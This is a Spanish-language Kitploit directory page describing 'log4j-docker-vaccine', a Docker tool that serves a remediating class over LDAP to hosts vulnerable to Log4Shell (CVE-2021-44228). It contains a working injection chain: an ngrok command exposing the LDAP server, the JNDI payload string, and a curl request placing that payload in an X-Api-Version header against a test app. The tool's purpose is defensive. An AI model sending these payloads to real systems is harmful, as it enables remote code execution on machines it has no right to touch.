Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4j-docker-vaccine — solucióN docker compose para ejecutar un entorno vacuna para la vulnerabilidad log4j2 CVE-2021-44228 | Kitploit
Herramientas/GitHubGitHub/jeffbryner/log4j-docker-vaccine
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubjeffbryner/log4j-docker-vaccine

log4j-docker-vaccine

solucióN docker compose para ejecutar un entorno vacuna para la vulnerabilidad log4j2 CVE-2021-44228

Ver Repositorio
2hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Vacuna Docker para Log4j

Una forma contenerizada de ejecutar la vacuna log4j ofrecida por Cybereason

  • https://github.com/Cybereason/Logout4Shell

Ponlo en marcha

Clona este repositorio:

root@kitploit:~
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git

Edita el archivo containers.env para que contenga una IP/DNS privada o pública precisa a la que tu objetivo pueda acceder. ¡La entrada predeterminada probablemente no funcionará para ti!

Construye y ejecuta los contenedores:

root@kitploit:~
docker-compose -f docker-compose.yml -p vaccine up

Ahora tienes un servidor ldap en escucha que servirá la clase Log4jRCE para inocular una instancia vulnerable de log4j.

Puedes exponer esto a internet (si quieres) usando ngrok.

  • https://dashboard.ngrok.com/get-started/setup
root@kitploit:~
ngrok tcp 1389

Puedes enviar una instancia vulnerable de log4j a esto usando la infame cadena de entrada jndi:

root@kitploit:~
${jndi:ldap://<ngrokurlgoeshere>:1389/a}

Pruebas

Hay una versión deliberadamente vulnerable de log4j en un contenedor disponible en:

  • https://github.com/christophetd/log4shell-vulnerable-app

Puedes seguir sus instrucciones para iniciarla y usarla para pruebas:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

Y activar la inoculación mediante:

root@kitploit:~
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
Descargar herramienta